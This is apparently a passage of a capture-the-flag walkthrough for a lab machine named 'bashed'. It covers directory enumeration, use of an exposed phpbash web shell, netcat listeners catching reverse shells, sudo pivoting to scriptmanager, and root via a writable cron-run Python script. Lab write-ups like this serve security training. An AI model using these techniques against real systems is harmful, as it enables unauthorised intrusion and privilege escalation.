2 :80
===============================================================
2021/05/01 15:46:31 Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/php (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/index.html (Status: 200) [Size: 7743]
/about.html (Status: 200) [Size: 8193]
/contact.html (Status: 200) [Size: 7805]
/css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/config.php (Status: 200) [Size: 0]
/fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
/single.html (Status: 200) [Size: 7477]
http://10.10.10.68/dev/
phpbash.min.php
phpbash.php
www-data@bashed:/var/www/html/dev# whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/var/www/html/dev# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL
Lets get our own shell using wget
$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 54206
SOCKET: Shell has connected! PID: 1540
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We can elevate to scriptmanager using
sudo -u scriptmanager /bin/bash [OR] sudo -i -u scriptmanager
whoami;id
whoami;id
scriptmanager
uid=1001(scriptmanager) gid=1001(scriptmanager) groups=1001(scriptmanager)
cd /scripts
ls -la
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Dec 4 2017 .
drwxr-xr-x 23 root root 4096 Dec 4 2017 ..
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec 4 2017 test.py
-rw-r--r-- 1 root root 12 May 1 16:48 test.txt
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
The test.txt is updated every minute (possibly running as cron) and is owned by root.
We can write to that file so python reverse-shell
$ rlwrap nc -lvnp 6969 listening on [any] 6969 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.68] 35062
/bin/sh: 0: can't access tty; job control turned off
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
Last updated